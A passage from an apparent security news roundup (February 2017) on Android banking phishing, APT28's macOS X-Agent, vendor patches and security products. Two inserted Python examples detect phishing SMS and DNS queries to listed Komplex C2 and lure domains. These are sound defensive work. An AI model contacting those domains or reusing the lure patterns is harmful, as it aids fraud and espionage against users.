Currently the Android/Spy.Banker malware is thriving mainly in Eastern Europe, most of all in Russia and Slovakia (photo: Eset)

The current wave of attacks is dangerous above all because of its careful localization, both in the delivered messages, in which we find no errors, and in the aforementioned domains, which really do look official. If you launched the app and entered your details into it, do not hesitate to contact your bank's customer line. Uninstall the app the usual way in Android settings under Apps. It very often bears the name Flash Player 10 Update, but in some cases the attackers also changed the name to DHL or Česká pošta.
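The two traits the article singles out, brand-lookalike links on the .online domain and a request to install an app, can be turned into a simple SMS triage rule. The following is an added example (not code from Živě.cz, Eset or any bank): the three lure domains are the ones named above, while the brand table, the assumed official domains and all sample messages are constructed for the example.

```python
import re
from urllib.parse import urlparse

# The three lure domains are the ones the article names. The brand table,
# the assumed official domains and every sample message below are
# constructed for this example and do not come from the article.
KNOWN_LURE_DOMAINS = {"alza-shop.online", "dhl-express.online", "ceskaposta.online"}

# Brand token -> official domains (assumption for the example).
IMPERSONATED_BRANDS = {
    "dhl": ("dhl.com", "dhl.cz"),
    "ceskaposta": ("ceskaposta.cz",),
    "alza": ("alza.cz",),
    "csob": ("csob.cz",),
}

URL_RE = re.compile(r"""https?://[^\s<>"']+""", re.IGNORECASE)
# Czech and English words that mark the "install our app" lure the article describes.
APP_LURE_RE = re.compile(r"\b(aplikac\w*|app|stáhn\w*|download\w*|instal\w*)\b",
                         re.IGNORECASE)

def _brand_in_host(host):
    """Return the brand token embedded in a hostname, ignoring dots and hyphens."""
    flat = host.replace("-", "").replace(".", "")
    return next((b for b in IMPERSONATED_BRANDS if b in flat), None)

def _is_official(host, brand):
    return any(host == d or host.endswith("." + d) for d in IMPERSONATED_BRANDS[brand])

def analyze_sms(text):
    """Classify one SMS body as 'phishing', 'review' or 'ok', with reasons.
    A bad link is decisive; an app-install lure alone only asks for review,
    because legitimate senders do advertise their apps."""
    reasons, bad_link = [], False
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host in KNOWN_LURE_DOMAINS:
            reasons.append(f"known lure domain: {host}")
            bad_link = True
            continue
        brand = _brand_in_host(host)
        if brand and not _is_official(host, brand):
            reasons.append(f"{brand} lookalike on unofficial domain: {host}")
            bad_link = True
    if APP_LURE_RE.search(text):
        reasons.append("asks the recipient to download or install an app")
    verdict = "phishing" if bad_link else ("review" if reasons else "ok")
    return verdict, reasons

# Constructed sample messages modelled on the lures the article describes.
SAMPLE_MESSAGES = [
    "DHL: change the delivery address for your parcel in our app: http://dhl-express.online/app",
    "Ceska posta: your parcel is waiting at the depot, details at http://ceskaposta.online/zasilka",
    "Alza: you have won! Install the app to claim: http://alza-vyhra.online/win",
    "DHL: shipment 123456 was delivered. Track at https://www.dhl.com/track",
    "CSOB: download our new banking app at https://www.csob.cz/app",
    "Reminder: dentist appointment tomorrow at 9:00",
]

def triage(messages):
    """Return (verdict, message) pairs for a batch of SMS bodies."""
    return [(analyze_sms(m)[0], m) for m in messages]

if __name__ == "__main__":
    for verdict, msg in triage(SAMPLE_MESSAGES):
        print(f"{verdict:9} {msg}")
```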


Signal Messaging App Rolls Out Encrypted Video Calling
15.2.2017 thehackernews Apple
WhatsApp and Facebook have so far the largest end-to-end encrypted video calling network of all, but now another popular end-to-end encrypted messaging app recommended by whistleblower Edward Snowden is ready to give them a really tough competition.
The Signal app, which is widely considered the most secure of all other encrypted messaging apps, released video calling feature on Tuesday for both Android and iOS in a new update.
Developed by open source software group Open Whisper System, Signal is a free and open source messaging application specially designed for Android and iOS users to make secure and encrypted messages and voice calls.
The Signal Protocol also powers the end-to-end encryption built into WhatsApp, Facebook Messenger, and Google Allo's Incognito mode.
Signal has already been providing fully end-to-end encrypted chat and voice calling features, but the newly added feature will make it even easier for privacy conscious people to convey their information face-to-face through video calling without compromising security.
Watch Out! There's a Privacy issue too!

This new video calling feature also comes with support for CallKit on iOS 10 devices, a new framework that makes Signal act more like the regular phone app.
CallKit in iOS 10 allows Signal users to answer calls with one touch from their device's lock screen and lists those calls in the device's native "Recent Calls" just like regular calls, possibly making it inconvenient for privacy-minded people.
CallKit is optional, and if users decide to opt-in this feature, some of their data might sync to Apple's iCloud servers, including who the Signal users called and how long they had the conversation, Signal's pseudonymous lead designer Moxie Marlinspike explains in a blog post.
The CallKit feature can be turned off within your iOS device's settings to enhance your privacy.
Currently, Signal’s video calling feature is in beta, which means both users will have to manually enable the feature for video calling to work.
To try out video calling in Signal, you will have to go into your Signal settings and enable 'Video calling beta' under 'Advanced.'


BitDefender found the first MAC OS version of the X-Agent used by the APT28
15.2.2017 securityaffairs APT

Security experts at Bitdefender discovered a MAC OS version of the X-Agent malware used by the Russian APT28 cyberespionage group.
Security experts at BitDefender have discovered a MAC OS malware program that’s likely part of the arsenal of the dreaded Russian APT 28 group (aka Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team). The Russian nation-state actor was involved in the cyber attacks against the U.S. Democratic National Committee during the 2016 Presidential election.

The researchers believe the group has developed a piece of malware called Sofacy or X-Agent that has been associated only with its espionage campaigns.

The experts have observed several strains of X-Agent specifically designed to compromise Windows, Linux, iOS and Android systems.

Now researchers at Bitdefender have spotted the first version of the X-Agent that was developed to compromise MAC OS systems.

The security firm hasn’t revealed how it has discovered the MAC OS version of the X-Agent, and currently, there is no information on the attack chain.

“APT 28 operators have upped their game – the Xagent payload now can target victims running Mac OS X to steal passwords, grab screens and steal iPhone backups stored on the Mac.” reads the analysis published by Bitdefender.

The X-Agent is a modular backdoor that was most likely planted on the target machines via the Komplex downloader.

The X-Agent malware can load additional modules; it can act as a backdoor or perform reconnaissance on the target system by gathering information about the hardware and software components of the host.

In September 2016, Palo Alto researcher Ryan Olson discovered that Fancy Bear used the Komplex trojan to target organizations in the aerospace sector that were using the MacKeeper antivirus software.

“The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload.” reads the analysis published by Palo Alto in September 2016. “Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.”

The Komplex malware has numerous similarities with the Carberp trojan; it was improved to gain access to PC and OS X systems and uses the same command-and-control server.

The researchers noticed that Komplex’s C2 domain appleupdate[.]org was not used in the past by the group, while both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to the activity of the APT 28.

The new MAC OS X-Agent leverages domain names similar to the one used by the Komplex Trojan, differing only in the TLD. The researchers also noticed identical project path strings inside both the Komplex and X-Agent samples, a circumstance that suggests the involvement of the same development team.

“Other indicators show that today’s sample also reports to a C&C URL that is identical to the Sofacy/APT28/Sednit Komplex OSX Trojan, minus the TLD (apple-[*******].net for Komplex vs apple-[*******].org for Xagent).” states Bitdefender.
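As an added example (not code from Bitdefender, Palo Alto or the article), the following Python flags DNS queries whose second-level label matches one of the Komplex C2 names quoted above regardless of the TLD, which is exactly the kind of lookalike the Bitdefender note describes; the log format, the log lines and the itunes-helper.org lookalike are constructed samples, not indicators taken from the article.

```python
"""Added example: match DNS queries against known C2 names ignoring the TLD.

Indicators are the defanged Komplex C2 domains quoted in the article. The log
format and log contents below are constructed for this example.
"""
import re

# Defanged indicators quoted in the article (refanged by refang()).
KNOWN_C2 = ["appleupdate[.]org", "apple-iclouds[.]net", "itunes-helper[.]net"]


def refang(domain: str) -> str:
    """Turn 'apple-iclouds[.]net' into 'apple-iclouds.net'."""
    return domain.replace("[.]", ".").lower().strip(".")


def sld_label(domain: str) -> str:
    """Return the label directly left of the TLD.

    Assumption: single-label public suffixes only (.org, .net). Names under
    multi-label suffixes such as .co.uk would need a public-suffix list.
    """
    labels = refang(domain).split(".")
    if len(labels) < 2:
        return ""
    return labels[-2]


def c2_label_index(indicators):
    """Map second-level label -> refanged indicator, e.g. 'appleupdate' -> 'appleupdate.org'."""
    return {sld_label(d): refang(d) for d in indicators}


# Constructed DNS log lines: "<timestamp> <client> <queried name>".
# itunes-helper.org is a constructed lookalike, not an indicator from the article.
SAMPLE_DNS_LOG = """\
2017-02-15T09:01:02Z 10.0.0.12 update.example.com
2017-02-15T09:01:05Z 10.0.0.12 itunes-helper.org
2017-02-15T09:02:10Z 10.0.0.31 www.apple.com
2017-02-15T09:03:44Z 10.0.0.31 apple-iclouds.net
2017-02-15T09:04:00Z 10.0.0.52 mail.itunes-helper.net
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def find_lookalike_queries(log_text, indicators=KNOWN_C2):
    """Return (timestamp, client, queried, matched_indicator, exact) tuples.

    exact=True means the registrable name (label + TLD) matched an indicator;
    exact=False means only the second-level label matched, i.e. a TLD swap
    like the .net / .org pair the article describes.
    """
    index = c2_label_index(indicators)
    exact_names = set(index.values())
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, qname = m.groups()
        qname = qname.lower().rstrip(".")
        labels = qname.split(".")
        if len(labels) < 2:
            continue
        registrable = ".".join(labels[-2:])
        label = labels[-2]
        if label in index:
            hits.append((ts, client, qname, index[label], registrable in exact_names))
    return hits


if __name__ == "__main__":
    for hit in find_lookalike_queries(SAMPLE_DNS_LOG):
        kind = "exact" if hit[4] else "TLD-swap lookalike"
        print(f"{hit[0]} {hit[1]} queried {hit[2]} ({kind} of {hit[3]})")
```

A match on the label alone is a lead for review, not proof of compromise; the exact flag separates the two cases so the TLD-swap hits can be triaged separately.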

In summary, the Komplex component discovered in September 2016 has been used exclusively as a downloader and installer for the X-Agent binary.

The investigation is ongoing … stay tuned!


Adobe just fixed thirteen code execution flaws in Flash Player
15.2.2017 securityaffairs Vulnerability

Adobe addressed thirteen highest severity code execution vulnerabilities in Flash Player for Windows, MAC OS, and Chrome.
Adobe released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions, and the Campaigns marketing tool.

Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. The updates address critical vulnerabilities that could be exploited by an attacker to take control of the vulnerable system.

Flash Player 24.0.0.221 addressed 13 critical code execution flaws, including type confusion, integer overflow, use-after-free, heap buffer overflow and other memory corruption issues.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.” reads the Adobe Security Advisory for the Flash product.

The flaws were discovered by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs, who reported the security issues to Adobe.

Nine flaws affecting the Digital Editions ebook reader were also fixed by Adobe with the release of version 4.5.4 for Windows, Mac, and Android.

Adobe fixed several kinds of vulnerabilities including a critical heap-based buffer overflow that can be exploited for arbitrary code execution and several important buffer overflows that could lead to a memory leak.

The flaws were discovered by the researcher Steven Seeley of Source Incite and Ke Liu of Tencent’s Xuanwu LAB.

“Adobe has released a security update for Adobe Digital Editions for Windows, Macintosh and Android. This update resolves a critical heap buffer overflow vulnerability that could lead to code execution and important buffer overflow vulnerabilities that could lead to a memory leak.” reads the Adobe Security Advisory for the Digital Editions product.

The last set of flaws affects the Adobe Campaign product for Windows and Linux; the release of Adobe Campaign 6.11 addresses a moderate severity security bypass flaw affecting the client console. The flaw could be exploited by an authenticated attacker to upload and execute a malicious file, which could result in read/write access to the system.

Adobe also fixed another flaw in the latest version of Campaign, a moderate severity input validation issue that can be exploited for cross-site scripting (XSS) attacks. The flaws were reported to Adobe by researcher Léa Nuel.

“Adobe has released a security update for Adobe Campaign v6.11 for Windows and Linux. This update resolves a moderate security bypass affecting the Adobe Campaign client console. An authenticated user with access to the client console could upload and execute a malicious file, potentially resulting in read and write access to the system (CVE-2017-2968). This update also resolves a moderate input validation issue that could be used in cross-site scripting attacks (CVE-2017-2969).” reads the Adobe Security Advisory for the Adobe Campaign product.


SAP Patches 22 Vulnerabilities With February 2017 Security Updates

14.2.2017 securityweek Vulnerability
SAP on Tuesday announced the release of its February 2017 security updates, which includes 15 Patch Day Security Notes and 3 updates to previously released Patch Day Security Notes.

Only High risk and Medium severity vulnerabilities were addressed this month, with the highest CVSS score of the vulnerabilities being 8.5. Multiple patches were released for SAP's HANA database management system.

According to ERPScan, a company specialized in securing SAP and Oracle products, SAP’s February 2017 Security Patch Day also saw the release of 7 Support Package Notes, for a total of 22 patches across products. 7 of the patches were rated High risk, while the remaining 15 were assessed as Medium severity.

The most common vulnerability type addressed this month is Missing Authorization Check (5 patches), followed by Cross-Site Scripting (4 patches), denial of service (3 patches), and XML external entity (2 patches). The remaining 8 flaws include: directory traversal, implementation flaw, privilege escalation, buffer overflow, ABAP code injection, cross-site request forgery, clickjacking, and multiple issues.

The most important issues addressed this month include a Missing Authorization Check vulnerability (CVSS Base Score: 8.5) in SAP Netweaver Data Orchestration (which could allow an attacker to access the service without authorization and use service functionality that has restricted access), along with an Implementation flaw vulnerability (CVSS Base Score: 8.2) in SAP GRC Access Control EAM (which can cause unpredictable behavior of a system, troubles with stability and safety).

Additionally, SAP patched a Memory Corruption vulnerability (CVSS Base Score: 8) in SAP 3D Visual Enterprise Author, Generator and Viewer, which could allow an attacker to inject a specially crafted code into a working memory which will be executed by the vulnerable application (the executed commands run with the same privileges as the service that executed the command).

Three of the issues were disclosed by ERPScan researchers, including multiple vulnerabilities in SAP HANA (CVSS Base Score: 8.3) – namely a denial of service that could allow an attacker to crash a process of a vulnerable component, and an Implementation Flaw (insecure default user creation policy) in the third-party repository server Sinopia – and an XML external entity vulnerability in SAP Visual Composer VC70RUNTIME (CVSS Base Score: 6.5).

The vulnerabilities in SAP HANA can be exploited together, ERPScan says: “The first vulnerability allows an attacker to create a new user over the Internet without authentication. After that, an adversary can create a new repository. If a package name contains special characters, the server will crash. As a result of the attack, the project would be unavailable meaning a stoppage of developing processes. Moreover, the vendor’s advisory states that other SAP HANA XS components also could be potentially impacted.”

In related news, Microsoft announced on Tuesday that a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.


ExtraHop Introduces Real Time Wire-Level Threat Detection

14.2.2017 securityweek Safety
IT analytics firm ExtraHop Networks today announced ExtraHop Addy, a cloud-based machine-learning wire data analytical tool that is being trained to automatically detect anomalies on the fly as they are happening.

Seattle, Washington-based ExtraHop was born in 2007. It was founded by senior architects Raja Mukerji and Jesse Rothstein, formerly from F5 Networks, with a vision of tapping wire data to provide the most complete and definitive information on the current state of the IT infrastructure. Since then ExtraHop has picked up hundreds of global customers, including Sony, Lockheed Martin, Microsoft, Adobe, and Google.

But the working of the infrastructure is not the only diagnosis that can be drawn from wire data. Wire data has been described by Rothstein as "everything on the network, from the packets to the payload of individual transactions. It is a very deep, very rich source of data... And it's definitive." Inevitably, within that data, are any and all subtle indications of cyber security compromise.

Machine-learning threat detection tools are not new. For the most part, however, they are high-speed forensic tools that rapidly analyze huge volumes of log data -- they can tell you what happened, but not necessarily what is happening.

Addy is a new SaaS offering that takes the data already derived from ExtraHop Network and analyzes it in the cloud. It builds a continuous baseline of normal behavior for every device on the network; it then analyzes what is happening against what it would expect to happen; and it highlights anomalies or issues to the IT team -- or the security team. This takes its potential beyond IT infrastructure monitoring into real time threat detection.

Early access customers have already demonstrated Addy's security value. One large cable company detected a server unexpectedly probing other systems in the datacenter and was immediately able to shut down the compromised server. A financial services firm was able to detect the Dyn DDoS attack in real time and route DNS traffic through an unaffected region to avoid downtime. And a national medical institution averted two potential security breaches when Addy detected international servers probing their DNS, as well as reverse DNS lookups.

Addy learns from both the customer's own environment and also crowd-sourced domain expertise. This means that the behavioral baseline for every device in the network is continuously improving, the accuracy of alerts is increasing, and false positives are minimized.

For the most part, the wire data sent to the cloud for analysis is kept in customer-specific compartments. Although that data includes nothing personally identifiable, this is an added assurance for customers concerned with any form of network data sharing, or otherwise concerned about the evolving data protection laws.

"ExtraHop provides a real-time view across the entire IT environment," explains Rothstein. "With Addy, we're taking the next step, applying machine learning techniques to this vast data set while leveraging the scale, elasticity, and compute power of the cloud."

Addy is available through an Early Access Program for select participants now, and will be available generally in April 2017.


Last Minute Issue Delays Microsoft Security Updates

14.2.2017 securityweek Vulnerability
Microsoft has apologized to customers “for any inconvenience” after a last minute issue forced the company to delay the release of its security updates for February 2017. It’s unclear when the patches will be made available.

“Our top priority is to provide the best possible experience for customers in maintaining and protecting their systems. This month, we discovered a last minute issue that could impact some customers and was not resolved in time for our planned updates today,” Microsoft said. “After considering all options, we made the decision to delay this month’s updates.”

The security updates released by the company for January 2017 consisted of only four bulletins, including one for Flash Player fixes. It is unclear how many flaws will be patched this month, but many hope Microsoft will address the recently disclosed denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.

Starting with this month, Microsoft will no longer publish security bulletins, replacing them with an online database called Security Updates Guide. For January, the company published both security bulletins and some release notes in the Security Updates Guide.

Microsoft has recently introduced a new patch process that includes a Monthly Rollup, which contains both security and non-security fixes, a preview of the Monthly Rollup, and security-only updates.

In order to reduce the size of the security-only update, starting with this month, Internet Explorer patches will be made available as a separate update. The Monthly Rollup will include all patches, including the ones for IE.

The decision to separate the browser updates was made after users asked Microsoft to provide increased flexibility by allowing them to independently deploy Windows and Internet Explorer patches.

Johannes B. Ullrich, dean of research at the SANS Technology Institute, speculated that this change in process may have caused this month’s delay.


Simulation Shows Threat of Ransomware Attacks on ICS

14.2.2017 securityweek Virus
Researchers at the Georgia Institute of Technology have demonstrated the potential impact of ransomware on industrial control systems (ICS) by simulating an attack aimed at a water treatment plant.

David Formby, a Ph.D. student in the Georgia Tech School of Electrical and Computer Engineering, and his faculty advisor, Raheem Beyah, identified several commonly used programmable logic controllers (PLCs) and tested three of them to determine how easily they can be hacked.

Once the devices were tested, including their password security and susceptibility to unauthorized configuration changes, the experts combined them with tubes, pumps and tanks in order to simulate a water treatment facility.

The attack simulation shows how an attacker with access to the PLCs can close valves, display false information to the operator, and increase the amount of chlorine added to the water.

“We were able to simulate a hacker who had gained access to this part of the system and is holding it hostage by threatening to dump large amounts of chlorine into the water unless the operator pays a ransom,” Formby said. “In the right amount, chlorine disinfects the water and makes it safe to drink. But too much chlorine can create a bad reaction that would make the water unsafe.”
Formby and Beyah discovered 1,400 instances of a single PLC type being accessible from the Internet, and pointed out that the organizations housing them often believe the devices are not vulnerable to attacks.

Ransomware attacks typically target data, even if the victim is a critical infrastructure organization. Last year, the Board of Water and Light (BWL) in Lansing, Michigan, was targeted with ransomware, but the attack affected its corporate network and there was no disruption to water or energy supplies.

However, Formby, Beyah and other experts believe profit-driven cybercriminals could increasingly attack ICS, especially since these systems are often poorly protected.

Experts recently raised concerns about ransomware being brought into the industrial domain when KillDisk, a disk-wiping malware used in high-profile attacks aimed at ICS, had been modified to include ransomware capabilities.


HPE Launches Threat Investigation, IoT Data Security Products

14.2.2017 securityweek Security
Hewlett Packard Enterprise (HPE) announced on Tuesday the launch of a new threat investigation solution, ArcSight Investigate, and a new SecureData product for IoT and big data.

HPE Security ArcSight Investigate is a product designed to provide security operations center (SOC) teams fast and intuitive search functionality to help them identify and respond to significant threats.

ArcSight Investigate can be integrated with Hadoop and other ArcSight products, including Data Platform (ADP) and Enterprise Security Manager (ESM).

The product is expected to become generally available in the second quarter. In the meantime, organizations interested in ArcSight Investigate can sign up for the early access program.

HPE has also unveiled SecureData for Hadoop and IoT. The product enables organizations to secure IoT data at rest, in transit and in use through integration with the Apache NiFi data processing and distribution platform.

As for protecting big data, HPE SecureData for Hadoop and IoT integrates with Hortonworks DataFlow (HDF) in order to secure information throughout the dataflow management and streaming analytics process. HPE says the original format of the encrypted data is preserved for processing and enabling secure big data analytics.

“While IoT and big data analytics are driving new ways for organizations to improve efficiencies, identify new revenue streams, and innovate, they are also creating new attack vectors for leaking sensitive information to adversaries,” said HPE’s Albert Biketi. “HPE SecureData enables business users to easily build data security in, delivering persistent protection in IoT and big data ecosystems, and allowing organizations to securely innovate.”

HPE SecureData for Hadoop and IoT is generally available worldwide as part of the company’s SecureData offering.


IBM's Watson Aims its Power at Security Operations Centers

14.2.2017 securityweek Security
Inside IBM's Cyber Range in Cambridge, MA

Watson for Cyber Security Integrates With IBM's New Cognitive Security Operations Center

The power of IBM's cognitive computing Watson has been directed at cyber security. For the last year, Watson has been absorbing the collective knowledge of a million cyber security studies, scientific reports and analyses. Now Watson is ready to stand behind the shoulders of the analysts that sift through the network alerts thrown up by the QRadar security intelligence platform in what IBM calls its Cognitive SOC.

Watson's purpose is to advise the analysts. It gains its knowledge through parsing the free text documents that hold the greater part of the world's security knowledge. Human analysts could never read the volume of data that is available -- but it is light work for a machine. Watson takes free text documents and parses them; absorbing key knowledge and relationships. Some of the data it absorbs could be wrong; but Watson relies on the power of collective crowd knowledge to sift the wheat from the chaff. The result is a huge and accessible corpus of security expertise.

The human analysts are also struggling with the sheer volume of events coming from their security intelligence platform. According to IBM, security teams must sift through up to 200,000 security events every day. Most of these are false positives that still need to be checked; but the result is up to 20,000 hours wasted every year. This is expected to double over the next five years.

Given the dearth of analysts, and especially the sparsity of expert analysts, this is a problem that will only get worse. Security intelligence platforms, such as QRadar, can generate huge volumes of warnings -- they create their own subset of Big Data. But the bloom of Big Data is wearing thin: the haystack is getting bigger, but mostly it just makes finding the needle harder.

Watson hides its own big data of knowledge within the machine, and then uses the power of the machine to direct the analyst to more targeted threat hunting in the QRadar alerts. The new app, IBM QRadar Advisor with Watson, is the first tool to tap Watson's security insights, and is already being used by 40 IBM customers including Avnet, the University of New Brunswick, and Sogeti.

"Today's sophisticated cybersecurity threats attack on multiple fronts to conceal their activities, and our security analysts face the difficult task of pinpointing these attacks amongst a massive sea of security-related data," explains Sean Valcamp, Chief Information Security Officer at Avnet.

"Watson makes concealment efforts more difficult by quickly analyzing multiple streams of data and comparing it with the latest security attack intelligence to provide a more complete picture of the threat. Watson also generates reports on these threats in a matter of minutes, which greatly speeds the time between detecting a potential event and my security team's ability to respond accordingly."

While Watson and QRadar are the key elements of the Cognitive SOC, IBM is extending it to the endpoint with the announcement of BigFix Detect. This is an endpoint detection and response (EDR) solution designed to detect and respond to malicious behavior in endpoints.

"The Cognitive SOC is now a reality for clients looking to find an advantage against the growing legions of cybercriminals and next generation threats," said Denis Kennelly, Vice President of Development and Technology, IBM Security. "Our investments in Watson for Cybersecurity have given birth to several innovations in just under a year. Combining the unique abilities of man and machine intelligence will be critical to the next stage in the fight against advanced cybercrime."

IBM is planning to improve the analyst (man) to Watson (machine) interface with a new research project code-named Havyn -- a voice-powered security assistant that will make Watson respond to the analysts' verbal commands and natural language. IBM is not the only vendor seeking to use natural language as the interface between man and machine. Earlier this month Dynatrace announced Davis, focused on monitoring the IT ecosystem. "It gives," announced the firm, "non-technical teams the ability to monitor and understand network health and performance issues via familiar communication tools. 'davis' has effectively 'consumerized' IT – this is an industry first."

Similarly, Endgame announced Artemis in late January. Artemis is a natural language chat interface between analysts and the Endgame Detect and Respond platform. The purpose behind Havyn, Davis and Artemis is to reduce the time spent by analysts in hunting out threats.

The IBM Cognitive SOC can be built on premise or built in the cloud through IBM Managed Security Services.

In November 2016, IBM Security unveiled a new global headquarters in Cambridge, Massachusetts, which features a physical Cyber Range designed to allow organizations in the private sector to prepare for and respond to cyber threats.


Qualys Expands Detection, Web App Security, and Data Sharing Portfolio

14.2.2017 securityweek Security
SAN FRANCISCO - RSA CONFERENCE 2017 - Cloud-based security and compliance solutions provider Qualys this week announced new tools and features to provide customers with improved detection capabilities, expanded web application security features, and improved vulnerability data sharing.

Qualys added two new detection solutions to its Cloud Platform, in the form of Qualys File Integrity Monitoring (FIM) and Indicators of Compromise (IOC), both meant to deliver more critical security and compliance functions in a single cloud-based dashboard. FIM and IOC bring to the Qualys Cloud Agent a combination of prevention and detection by adding continuous visibility of breaches and system changes to the single-pane view of security and compliance posture that the Agent already offers.

Qualys FIM was designed to log and centrally track file change events across global IT systems, while offering a single-view dashboard for identifying critical changes, incidents, and audit risks caused by various factors, including normal patching and administrative tasks, change control exceptions or violations, and malicious activity.

A cloud-based solution, FIM doesn’t require the deployment and maintenance of complex security infrastructure, which also results in improved compliance, reduced downtime, and limited damage from compromise. With FIM, customers get features such as out-of-the-box profiles based on industry best practices and vendor-recommended guidelines, real-time change engine to monitor files and directories specified in the monitoring profile, and automated change reviews of workflows.

Qualys IOC, on the other hand, continuously monitors endpoint activity for suspicious activity that could signal the presence of known malware, unknown variants, and threat actor activity on devices both on and off the network. The solution brings together endpoint detection, behavioral malware analysis, and threat hunting techniques, the company says.

Qualys IOC provides customers with continuous event collection through Cloud Agent's data collection and delta processing techniques, as well as with highly scalable detection processing (as analysis, hunting, and threat indicator processing are performed in the cloud). Moreover, the solution offers actionable intelligence for security analysts, to help them prioritize responses for critical business systems.

According to Qualys, security administrators will benefit from multiple enhancements that FIM and IOC bring to the Cloud Agent and cloud-based processing platform, including easy setup and no maintenance needs (modules can be instantly activated), minimal impact on performance (the Cloud Agent monitors file changes and system activity locally but sends all data to the Cloud Platform), unified security posture (FIM and IOC alert data is presented in a single, integrated view), and integration with AssetView (providing dynamic dashboards, interactive and saved searches, and visual widgets to analysts).

“Breaches continue to rise despite the investments in traditional mechanisms that organizations have deployed to support their businesses in the new era of digital transformation. Our new disruptive services for FIM and IOC extend the capabilities of our Cloud Agent platform, allowing companies to get the visibility and prevention they need against cyber threats from one single platform, drastically reducing their security costs,” Philippe Courtot, chairman and CEO, Qualys, said.

Expanded web application security offerings

With the release of Qualys Web Application Scanning (WAS) 5.0 and Web Application Firewall (WAF) 2.0 this week, the company added new functionality to its web application security offerings, in an attempt to provide customers with scalable fast scanning, detection and patching of websites, mobile applications and Application Programming Interfaces (APIs), in one unified platform.

The newly released WAS 5.0 offers not only programmatic scanning of Simple Object Access Protocol (SOAP) APIs, but also the testing of REpresentational State Transfer (REST) API services, Qualys announced. Moreover, it delivers scanning of IoT (Internet of Things) services and mobile apps, as well as API-based business-to-business connectors, and can automatically load-balance scanning of multiple applications across a pool of scanner appliances for efficiency. Moreover, improvements made to Progressive Scanning allow customers to scan very large sites, one slice at a time, to cover large applications that are problematic to scan in a short window.

WAF 2.0, on the other hand, offers one-click virtual patching feature to address both false-positives and the inability to quickly patch vulnerabilities; out-of-the-box security templates for popular platforms such as Wordpress, Joomla, Drupal and Outlook Web Application; and support for VMWare, Hyper-V, and Amazon Web Services, along with features such as load-balancing of web servers, health checks for business-critical web applications, custom security rules based on HTTP request attributes, reusable Secure Socket Layer profiles, detailed event log information, and centralized management.

Both Qualys WAS 5.0 and WAF 2.0 are available now as annual subscriptions. Pricing for Qualys WAS starts at $1,695 for small businesses and $2,495 for larger enterprises, while pricing for the WAF solution starts at $1,995 for small businesses and $9,995 for larger enterprises.

Vulnerability data sharing

In addition to the expanded portfolio, Qualys also announced a partnership with crowdsourced security testing company Bugcrowd to allow joint customers to share vulnerability data across automated web application scanning and crowdsourced bug bounty programs.

The joint integration between Bugcrowd Crowdcontrol and Qualys Cloud Platform brings together automated web application scanning (WAS) and penetration-testing crowd in a single solution. Thus, joint customers should be able to eliminate vulnerabilities discovered by Qualys WAS from their list of offered bug bounties, while focusing on Bugcrowd programs and critical vulnerabilities that require manual testing.

The initial stage in this collaboration allows Bugcrowd customers who also have Qualys WAS to import vulnerability data into the Bugcrowd Crowdcontrol platform and use it to optimize their bug bounty program scope and incentives. In the future, joint customers running a bug bounty platform on Bugcrowd will be able to import unique vulnerabilities from Crowdcontrol into Qualys WAS and apply one-click patches through the fully integrated Qualys Web Application Firewall.

“With the move of IT to the cloud and all the digital transformation efforts underway, web apps are exploding and securing these apps is now front and center. By combining the automation of Qualys Web Application Scanning (WAS) and Bugcrowd's crowd sourcing platform, organizations can now cover a much larger number of applications and secure them more effectively at a lower cost,” Sumedh Thakar, Chief Product Officer, Qualys, said.


Senators Launch Query on Trump's Smartphone Security

14.2.2017 securityweek Mobil
Washington - Two US senators have requested details on President Donald Trump's smartphone security, saying he could jeopardize national secrets if he is still using his old handset, as some reports say.

"Did Trump receive a secured, encrypted smartphone for his personal use on or before Jan. 20? If so, is he using it?," said a tweet Tuesday by Senator Tom Carper, who along with fellow Democrat Claire McCaskill released a letter to the administration requesting information on the president's device.

"Trump should be well aware by now of the appropriate and necessary protocol to safeguard our nation's secrets."

The letter from the two lawmakers, dated February 9, was sent to Defense Secretary James Mattis along with Homeland Security chief John Kelly and the National Security Agency director Michael Rogers. The senators released the letter late Monday.

The lawmakers said they were concerned by reports that Trump was still using an Android device that may be several years old for his frequent personal Twitter messages.

"While it is important for the president to have the ability to communicate electronically, it is equally important that he does so in a manner that is secure and that ensures the preservation of presidential records," the letter said.

"The national security risks of compromising a smartphone used by a senior government official, such as the president of the United States, are considerable."

The New York Times reported last month that while Trump had received a new, secure device after his inauguration, he still relied on his older device despite protests from aides.

That report prompted a flurry of comments from security experts who argued that the president would be inviting danger by using his old personal phone.

Trump's smartphone "would probably be the most widely prized device on the internet for hackers -- and top of the target list for intelligence agencies around the world," said independent security researcher Graham Cluley in a blog post Tuesday.

Last month, Nicholas Weaver of the International Computer Science Institute in Berkeley, California, warned that "Trump's continued use of a dangerously insecure, out-of-date Android device should cause real panic."

Writing on the Lawfare blog, Weaver noted that hackers could gain access to the phone's location as well as its microphone and camera and that "the working assumption should be that Trump's phone is compromised by at least one -- probably multiple -- hostile foreign intelligence services and is actively being exploited."


Over a Dozen Code Execution Flaws Patched in Flash Player

14.2.2017 securityweek Vulnerebility
Adobe on Tuesday released security updates that address two dozen vulnerabilities in Flash Player, Digital Editions and the Campaign marketing tool; none of the flaws are known to have been exploited in the wild.

